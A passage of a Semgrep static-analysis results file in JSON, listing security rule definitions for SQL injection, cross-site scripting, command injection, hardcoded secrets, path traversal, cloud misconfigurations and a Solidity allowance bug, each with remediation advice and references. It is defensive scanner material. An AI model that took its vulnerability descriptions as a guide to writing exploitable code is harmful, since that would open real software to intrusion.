[https://golang.org/pkg/io/#WriteString](https://golang.org/pkg/io/#WriteString)\n","text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","id":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","name":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli)\n - [https://github.com/MagicStack/asyncpg](https://github.com/MagicStack/asyncpg)\n - [https://magicstack.github.io/asyncpg/current/](https://magicstack.github.io/asyncpg/current/)\n","text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","id":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","name":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"help":{"markdown":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"help":{"markdown":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html)\n","text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"helpUri":"https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket","id":"json.aws.security.public-s3-bucket.public-s3-bucket","name":"json.aws.security.public-s3-bucket.public-s3-bucket","properties":{"precision":"very-high","tags":["CWE-264: CWE CATEGORY: Permissions, Privileges, and Access Controls","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.public-s3-bucket.public-s3-bucket"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli","id":"kotlin.spring.hibernate-sqli.hibernate-sqli","name":"kotlin.spring.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write","id":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","name":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-command-write.dangerous-command-write"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"help":{"markdown":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality)\n - [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)\n - [https://www.whitehatsec.com/blog/magic-hashes/](https://www.whitehatsec.com/blog/magic-hashes/)\n","text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"helpUri":"https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality","id":"php.lang.security.md5-loose-equality.md5-loose-equality","name":"php.lang.security.md5-loose-equality.md5-loose-equality","properties":{"precision":"very-high","tags":["CWE-697: Incorrect Comparison","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.md5-loose-equality.md5-loose-equality"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli)\n - [https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries](https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli","id":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","name":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.sequel-sqli.sequel-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"bcrypt hash detected"},"help":{"markdown":"bcrypt hash detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"bcrypt hash detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","id":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","name":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"help":{"markdown":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs)\n - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/](https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/)\n","text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","id":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","name":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","id":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","name":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy)\n - [https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html](https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html)\n - [https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html](https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","id":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","name":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This gets data from session using user inputs. A malicious user may be able to retrieve information from your session that you didn't intend them to. Do not use user input as a session key."},"help":{"markdown":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation)\n - [https://brakemanscanner.org/docs/warning_types/session_manipulation/](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n","text":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","id":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","name":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Allowing an attacker to manipulate the session may lead to unintended behavior."}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"help":{"markdown":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n","text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file","id":"ruby.rails.security.brakeman.check-send-file.check-send-file","name":"ruby.rails.security.brakeman.check-send-file.check-send-file","properties":{"precision":"very-high","tags":["CWE-73: External Control of File Name or Path","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-send-file.check-send-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","id":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","name":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"help":{"markdown":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","id":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","name":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"transferFrom() can steal allowance of other accounts"},"help":{"markdown":"transferFrom() can steal allowance of other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug)\n - [https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5](https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5)\n - [https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C](https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C)\n","text":"transferFrom() can steal allowance of other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","id":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","name":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","id":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","name":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","id":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","name":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"help":{"markdown":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not 